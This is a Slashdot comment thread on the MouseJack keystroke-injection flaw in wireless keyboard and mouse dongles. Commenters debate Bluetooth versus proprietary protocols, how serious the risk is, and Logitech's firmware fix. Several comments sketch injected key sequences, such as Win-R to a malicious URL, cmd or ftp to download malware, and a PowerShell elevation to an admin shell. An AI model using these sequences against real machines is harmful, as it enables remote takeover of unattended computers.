Mousejack Attacks Exploit Wireless Keyboards and Mice (threatpost.com) 112
msm1267 writes: Researchers have discovered a vulnerability in the USB devices that support wireless keyboards and mice that could put a countless number of devices at risk to attack. Seven manufacturers have been informed of the flaw, but as of today, only Logitech has produced a firmware update. Some have no update mechanism and can never be patched. The issue lies in the fact that some of the commands from the peripheral device to the dongle are not encrypted. Most do not authenticate packets and an attacker within close proximity and using a USB transmitting malicious packets over radio frequency can trick the victim's machine into accepting mouse clicks impersonating keystrokes. It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.
And that, ladies and gentlemen... (Score:4, Insightful)
...is why you should be using bluetooth instead of cheaping out. Saves a USB port, too!
Re:And that, ladies and gentlemen... (Score:5, Interesting)
But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PC's that come with native Bluetooth support
Re: (Score:2)
Dunno. My ~4 year old ASUS motherboard has bluetooth on board.
Re: (Score:2)
I was assuming a laptop, which almost always has built-in Bluetooth. A desktop with no Bluetooth I'd just use a wire.
Bluetooth range (Score:2)
True, but many (most?) PC laptops don't have enough range to use a Bluetooth keyboard or mouse.
And you're basing this on ONE test case? I don't know whether it was the logitech or the Dell stuff that sucked, but one of them must have.
Between several keyboards, mice, and laptops (logitech, microsoft, dell, and a few no-names), I've never had any real problem with bluetooth range. The 'whole house' seems to be the range - I only get problems from the furthest bedroom to the garage on the opposite side.
Re: (Score:2)
Re:Bluetooth range (Score:5, Insightful)
You tried to use 1600 bluetooth keyboards and mice in relatively close proximity (probably open plan/cubicle office) and are surprised they didn't work? you probably had them all networked using wifi at the same time as well...
Re: (Score:2)
Nope, didn't miss that. You simply repeated the same experiment 'a case worth' of times. Same model Laptops, same production run of mice/keyboards. Hell the mice & keyboards were probably sequentially produced on the same line.
Then, as mindwhip mentioned - how noisy is your environment? My house is a lot quieter on the 2.4Ghz zone than an office with lots of laptops connecting wireless. For one, my network is in the 5GHz.
Re: (Score:1)
This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be h
Re: (Score:2)
This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be handled at the application layer.
When I see some mouse or keyboard requiring its own dongle, I move on. If they are too cheap to use an industry standard for their stuff, then I'm suspecting they skimped on security somewhere else.
I don't know one way or the other, so this is pure speculation, but it may be a cost issue. Some may scoff, but virtually any difference in wholesale / production level quantity costs beyond the trivial usually means one wins overwhelmingly over the other. A case in point ... Firewire chips (the original 400 MHz versions) were about $25 in wholesale / 1000 qty versus USB 1.1 at around $15. FW has significant performance advantages over USB, not the least of which is it is fully self-managing whereas USB req
Re: (Score:3)
Not sure of many PC's that come with native Bluetooth support.
Besides iMacs, which have had it for ten years.
Re: (Score:1)
I wonder if a $10 dongle would remedy the situation with most laptops.
Realistically, in a dense office environment, it might be better to just go with wired devices, to minimize congestion on the airwaves.
Re: (Score:2)
Re: (Score:2)
You have a better chance that your computer already has Bluetooth than it has some random proprietary wireless method.
Re: (Score:2)
Re: (Score:2)
But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PC's that come with native Bluetooth support
Most laptops, many all-in-ones, and a few desktops have bluetooth built in. Of course, it's usually attached to the USB bus... but not always
Re: (Score:2)
Mousejack? (Score:3)
I thought someone is deploying tools to give rodents hand jobs, and that was terribly odd to be on /.
Re: (Score:2)
Re: (Score:1)
Re: (Score:2)
Or, just use a wired keyboard and mouse. Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?
Re: And that, ladies and gentlemen... (Score:2)
Not every user of a "desktop" computer sits in front of a desk; some sit on a bed or couch (HTPC anyone?). Then there are those who just don't like wires for aesthetic reasons.
Re: (Score:2)
And then there's the %#@%$@ mess on my desktop always getting in the way of the mouse's cable.
Re: (Score:2)
Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?
But the keyboard does move -- usually to temporarily make room for something else: notepad, snacks, book, body parts. And then the cable invariably trips either the wine glass or the coffee cup. The wireless signals have a better track record of not doing that.
Re: (Score:2)
Re: (Score:2)
I'm the only person in my office that still uses wired keyboard and mouse and I don't find it inconvenient at all. My mug of tea sits between the keyboard and mouse cables and there have been no mishaps.
Re: (Score:2)
Oh the part I hate is the connect delay you get with bluetooth.
If I want to type "The quick brown fox jumps over the lazy dog" on a bluetooth keyboard that has been left idle by the time I finish typing the keyboard has just reconnected and I get "og"
You don't have that problem with most of the proprietary wireless spec keyboards and mice.
Re: (Score:2)
Bluetooth is closed and poorly vetted. Do not count on it being secure.
Re: (Score:2)
Used to be the case that the reaction time on non-BT wireless was quicker. It wasn't necessarily cheaping out as the proprietary solution actually provided a benefit. More overhead in the BT protocol meant more lag. Not sure if that's still true with current BT hardware/software stacks.
Not something you'd notice typing in the office, but gamers...
Re: (Score:2)
The other problem I had with Bluetooth is stuck keys or sticky keys caused by flaky signals. I used to use an Apple Bluetooth keyboard with my Mac Mini. It worked,
Re: (Score:1)
I know this is gonna sound strange, but when it comes to input devices like keyboards and mice, I've had really good luck with Microsoft. I dunno who's making 'em or if they're just rebadged OEM stuff but they're pretty good. I noticed quite by accident and not entirely intentionally. They're good enough that I've stuck with 'em for a long time and have been really happy given the times I've had to use other products.
Re: (Score:2)
1. Wireless 2. Secure. (Score:2)
Pick one.
Security is always a trade-off, where you decide how determined your attacker is going to be, and weigh that against convenience.
If you're choosing wireless peripherals, you are leaning so far toward the "convenient" that you're wasting your time if you think any other security measures can make up for it.
No way (Score:5, Funny)
There's no way my wireless keyboard could ever be hacked in this fashion beca I MADE $125,000 YEAR BY USING THESE SIMPLE STEPS - CLICK HERE TO LEARN MORE http://888999444333.ze/?bypass... [888999444333.ze]
Re: (Score:3)
DING! WINNER! Internet won! Time to go home everyone, we're done for the day!
Re: (Score:1)
Silly person -- using a keyboard that &$*#@78g9789%^&#$%^&@$# -- wait, switching to my wired keyboard now. Using a keyboard that can be hijacked like that.
Hold on, my malfunctioning wireless keyboard is blinking something on the LEDs -- S-I-G-N-A-L-J-A-M-M-E-D-N-O-C-A-R-R ...
Re: (Score:1)
Ah, one of my favorite quotes is from a buddy of mine who had lived in the Deep South... "I ain't never scared."
Your link doesn't resolve. Yes, yes I did click it. I figured someone had to.
Risk Level (Score:2)
Just how much of a risk is there to this exploit?
"A Logitech spokesman told the MIT Technology review that the company has a software update to fix the issue, but that the vulnerability Bastille detected “would be complex to replicate” since it requires being physically close to the victim, which makes it “a difficult and unlikely path of attack.”
It seems to me that you would have to be fairly close to the system that you are attacking as the USB plug doesn't have a lot of power or r
Re: (Score:2)
How much of a potential reward is there?
Things like this usually show it's technically feasible, even if impractical. But if the payoff is high enough, it's probably worth someone doing.
Today's "too difficult to replicate" can easily become "tomorrow's hack in the wild". But if someone sees enough possible payoff for doing it, it's just one more thing.
And it seems there's always someone looking to exploit anything just because it's there.
Re: (Score:2)
With such an obvious motive I have zero sympathy for the utter losers that rushed their product out the door with inadequate security. The products are not fit for the purpose they are designed for.
Re: (Score:2)
Of course, the problem with that is that the "losers that rushed their product out the door with inadequate security" aren't the people we need to feel sorry for in this case ... like every other piece of shit consumer technology with non-existent security, it's the consumer who suffers.
Put the makers of this tech on the hook for paying damages, or throw the CEOs in jail .. t
Re: (Score:2)
Just how much of a risk is there to this exploit?
The answer is "enough." I can't imagine coming under this kind of attack myself, but it should be cause enough for a targettable company that deals with sensitive (valuable) data to think twice about rolling out wireless keyboards/mice.
it requires being physically close to the victim['s computer]
which could be on the other side of a locked door, or a (fairly thin) wall, or a floor...
High, actually. Re:Risk Level? (Score:5, Informative)
The issue is that if this can be a broadcast attack, it doesn't need to be successful any more than hacking an ad network needs 100% infection rates - if I can drive up outside a multi-story office building with a cheap adapter at the end of a USB extension cable (and perhaps an appropriate dish) and broadcast "Win-R http://attacksite.site/<Enter>", how many of the PCs in window offices will load that site which loads various exploits based on detection of the browser? This is even better than spearphishing because I don't have to worry about getting through email filters, and if I manage it right I know what company/companies I targeted at what time along with my trojan access to one or more computers within those offices.
Remember, this is injection of events, not 2-way communication. There's no handshaking or anything else.
I'm going to be keeping track of this and probably pushing some customers to eliminate or at least replace some cordless equipment - that was an agenda item before, but this can make it a high-priority agenda item.
Load malware? (Score:2, Insightful)
“It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”
Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
For a particular target, a way can probably be devised, but it will most likely be slow and visible. And not work with the next target.
Injecting keys is clearly a security flaw with severe consequences, but over-hyping it is unproductive.
Re:Load malware? (Score:4, Informative)
Really? With just keystrokes and mouse moves?
Yup. Actually, just keystrokes - the summary's a bit confused on the subject, but the article says nothing about spoofing mouse moves and clicks - it does, however, say that in some cases an attacker can impersonate the mouse but use it to send keypress packets (the keyboards in question encrypt these, but the receiver accepts them unencrypted from the "mouse").
but it will most likely be slow and visible
Not necessarily. What if you want access to a computer you can see through a window (and verify that no-one is near), but is behind a locked door? Even if you can't see the screen, sending Win+R c m d [enter] and so on seems fairly doable.
Re: (Score:2)
Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
start-button->cmd->ftp(malware site & file)->execute downloaded malicious file.
as long as the start button isn't actually up when you do it, it should have a reasonable chance of success.
Re: (Score:2)
What's a “start button”? :-
And to wonkey_monkey: what would “òcmd” achieve? “ò” is the character that XTerm generates with win-R.
To achieve anything, you need either feedback (“see through a window”) or strong assumptions about the user interface currently running.
Re: (Score:2)
What's a “start button”?
The button that typically has the picture of a window on it.
start->R gives you the ability to execute a command via type interface on windows. Use it to spawn a CLI shell. use CLI shell to write a script that spawns a process that downloads & executes the malware.
Yes, it's operating system specific. So freaking what? So isn't the malware I'm going to attempt to load. There's not enough linux users out there to matter, as the AC mentions. Crackers, like terrorists, like to target soft targets.
Re: (Score:2)
testing with my Mint install: Alt-F2 instead, then gnome-terminal.
or start button ->terminal
both bring up a command prompt, which will allow you to(depending on settings) download and execute a file.
assuming they're not stupid enough to run as root, they're at least limited to the user's rights unless an exploit exists; getting code to execute on the target machine is 90% of the work.
Re: (Score:2)
On Windows, sure:
Win-R
"powershell" + Enter
"start-process powershell -verb runas" + Enter
one left-arrow key
Enter
This should work on practically any Windows install that includes PowerShell and is at a live desktop. You're now at an admin shell from which you can download whatever you want and run it. As you mentioned, all of this activity will be visible, but if you're away from the keyb
Re: (Score:2)
So it works in certain cases with a lot of assumptions. Exactly what I was saying.
Re: (Score:2)
Re: (Score:2)
So it works in certain cases with a lot of assumptions. Exactly what I was saying.
Where "certain cases with a lot of assumptions" equals "a computer running a recent version of Windows". I'm guessing that there might be a few of those out there.
Re: (Score:1)
The terminal is *usually* mapped to CTRL + ALT + T with *most* distros that I've actually dug into. I've noticed one that didn't do that, I think I've made it so it *does* do that on that VM. I can dig it back out. I didn't check it on all of 'em nor have I tried all of 'em. I'm pretty sure that if I can get that close to the device, I can take a minute to figure out what the OS is. Hell, I can probably find the layout and then write a shim and mirror it over a replicated desktop and map mouse movements, al
Re: (Score:2)
And where "recent" equals "any version released in the last 10 years".
Re: (Score:1)
“It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”
Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
Win-R -> http://www.malicious-site.com/ [malicious-site.com] -> flash exploit (or whatever)
matter of seconds.
Re: (Score:2)
Re: (Score:2)
"With no feedback about where the keystrokes and clicks end up?"
I'm guessing most OSes have a hot key to access the menu, from there you can start an appropriate terminal using just keystrokes, and once in a terminal, well.... it's open slather. Don't dismiss what can be done with just keystrokes.
Re: (Score:2)
Re: (Score:2)
"without feedback"
Except you do get feedback... whether your OS-specific exploit worked or not. If it does work, then the target is using that exploit. If not, try an exploit specific to a *different* OS. Start off just trying to ping a known address where you are logging, and note which stage gives you a ping that actually shows up in the log. Once you have identified the OS then you can get on with the real payload.
Re: (Score:2)
Yes. Keyboard shortcut to launch browser then URL.
If you order it to download your rootkit or whatever you can get feedback from wherever you have hosted your little bit of nastiness to tell you that it has been picked up.
Re:Load malware? (Score:4, Informative)
Re: (Score:2)
Yes, just typing, and in a matter of seconds. Just typing: no seeing what you type, no knowing the keyboard layout, no knowing the user interface running, nothing except keys blindly. As was already pointed out by numerous persons before you posted your duplicated comment, this would work on lusers computers left to the default values. A rather costly attack (requires hardware and physical presence) that can only work generically on the most worthless of targets. Not really worrying. (Of course, for targete
Re: (Score:2)
Don't need to know the keyboard layout. Only need to guess that it's a window's machine that is unlocked. You could also move the mouse or perhaps press the scoll-lock key occasionally to prevent the screen saver from automatically starting.
Unlike most of the other responses that I scanned through at the time, which required a browser exploit, or ftp access. This approach could be used to run arbitrary code without the assistance of a 3rd party server, or a known browser exploit. It only depended on Win+R,
Re: (Score:2)
Two mistakes in your message:
“Don't need to know the keyboard layout”: how do you type the ‘m’ in “cmd” on an AZERTY keyboard?
“Arbitrary code”: no, only code that is already present on the computer. Typing binaries with just the keyboard and generic software is tricky.
Re: (Score:2)
We're talking about a targeted attack that requires local (-ish) access. Firstly you can probably assume the target has a locale appropriate to their location. However that isn't required, as a USB HID device can send raw 16-bit unicode.
Did you really read that link?
# our hex binary
shell_exec = "4d5a90000300000004000....
That's a hex dump of a PE .exe file. They then type a powershell script to convert it to binary. That's arbitrary code right there. Unless you have gone to unusual lengths to prevent the launching of an .exe.
"mouse clicks impersonating keystrokes" (Score:2)
mouse clicks impersonating keystrokes.
The article is clearer on what this suppoed to mean:
An attacker can impersonate the mouse but transmit keypress-packets
Last Post (Score:1)
Say goodbye Microsoft keyboard and mouse. Glad I had a spare :-/
Affected devices [bastille.net]
"Working with vendors for 90 days" (Score:1)
Logitech firmware update not _actually_ available? (Score:1)
As of 13:35 Pacific time, the updated Logitech firmware doesn't seem to be actually downloadable.
It's nice of Logitech to develop such software, but they actually have to publish it for it to make a difference.
(Tried both my OSX and Windows 7 machines, the Logitech Unify software says no updates available, nothing but questions on their forum)
Re: (Score:1)
Here's the official statement from Logitech.
The post:
http://forums.logitech.com/t5/Mice-and-Pointing-Devices/Logitech-Response-to-Unifying-Receiver-Research-Findings/m-p/1493878/thread-id/73186
The file
http://logt.ly/0222
DL the linked file, run it (it will not really do anything that you can see) then try updating the firmware thru the Unifying software. It is all in the post
So where's this Logitech firmware update? (Score:2)
So where's this Logitech firmware update? I searched their website, looked at the downloads offered for my mouse (MX Master), and there isn't a firmware update utility. Checked all OSes.
I wish I could use just bluetooth with it instead of the dongle, but Ubuntu 14.04 doesn't seem to work with it with bluetooth... My chromebook on the other hand works flawlessly.
Download links (Score:1)
Here ya go...
https://forums.logitech.com/t5... [logitech.com]
Just buy a similar keyboard/mouse (Score:4, Funny)
I worked as a one-man IT dept for a small private school for a few years. Someone donated a bunch of wireless keyboard/mouse sets one year, which were used by several of the teachers (without my involvement).
Shortly afterwards, I started getting odd "OMG, my computer is infected" reports. Mouses were moving on their own, and random typing was appearing out of nowhere.
The ethernet jacks were usually on shared walls, which resulted in PCs ending up on opposite sides of the same wall (only 2-3 feet apart). Since the devices only had three channels, several of these pairs had ended up on the same one, with hilarity ensuing. :)
Reversed sounds worse (Score:2)
Could this hack be reversed, ie: log keystrokes from a wireless keyboard? That sounds substantially more dangerous and more useful to a hacker than sending keystrokes. I've always been wary of wireless keyboard for this reason, but mice are pretty much a non-issue if their data could be captured. Mouse data sending is probably just as useless.
Logitech's response (Score:1)
Here's the official statement from Logitech.
The post:
http://forums.logitech.com/t5/Mice-and-Pointing-Devices/Logitech-Response-to-Unifying-Receiver-Research-Findings/m-p/1493878/thread-id/73186
The file
http://logt.ly/0222
DL the linked file, run it (it will not really do anything that you can see) then try updating the firmware thru the Unifying software. It is all in the post
I installed this and it breaks a few things in the software, like displaying variables instead of the text in the update options, but i
Glad I dont use wireless keyboards and mice... (Score:2)
Not only do wireless keyboards and mice (regardless of technology) chew through batteries but they are also vulnerable to attacks? Glad I am not using them on my PC then (Logitech K120 keyboard and Gigabyte GM-M6580 laser mouse)
Re: (Score:2)
I have to replace the batteries in my BT keyboard about every six months. My BT mouse is still on its original set, two years later.
Re: (Score:2)